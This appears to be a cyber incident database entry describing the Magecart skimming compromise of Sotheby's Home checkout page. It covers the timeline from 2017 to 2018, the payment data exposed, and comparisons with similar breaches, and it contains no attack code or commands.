Cyber Incident Victim: Sotheby's
Date:
Mar 2017
Location:
United States of America
Summary
A British auction house's e-commerce platform was compromised by Magecart digital skimming malware, which operated undetected for an extended period exceeding one year. The malicious code targeted payment forms to harvest customer names, addresses, email addresses, and full credit card details including CVV codes. The attack involved direct website infiltration rather than third-party supply chain compromise, mirroring techniques observed in other high-profile breaches. While the organization promptly removed the code upon discovery, the exact timeframe of initial compromise remained undetermined. The incident primarily impacted U.S. customers through the company's home goods marketplace, with stolen data potentially exposed to rapid resale on criminal platforms based on patterns from comparable breaches.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
Sotheby's disclosed a cybersecurity incident involving its e-commerce platform Sotheby's Home (formerly Viyet), where malicious third parties injected digital skimming code into the website. The auction house detected and removed the malicious code on October 10, 2018, but forensic analysis revealed the compromise had persisted since at least March 1, 2017. This 19-month exposure period left an undetermined number of customer payment records vulnerable, as investigators could not establish the exact initial intrusion date. The skimming code specifically targeted payment information submitted through the website's checkout form, capturing names, addresses, email addresses, payment card numbers, expiration dates, and CVV security codes during transactions.
The attack methodology involved direct website compromise rather than third-party supplier infiltration, aligning with techniques observed in contemporaneous Magecart campaigns against British Airways and Newegg. Sotheby's delayed public notification by nearly two months following code removal, raising potential GDPR compliance concerns despite the platform primarily serving U.S. customers. Historical patterns from similar breaches indicated stolen payment data often appeared on dark web marketplaces within days of exfiltration, as documented by RiskIQ's analysis of prior Magecart operations. Multiple threat actor groups were known to deploy overlapping skimming techniques during this period, with some engaging in competitive sabotage to monopolize illicit profits. The incident exposed systemic vulnerabilities in Sotheby's web infrastructure monitoring capabilities, given the extended dwell time before detection. No specific data misuse or fraudulent transactions were confirmed in Sotheby's disclosure, though the scale of potential impact remained unquantified due to uncertain breach chronology.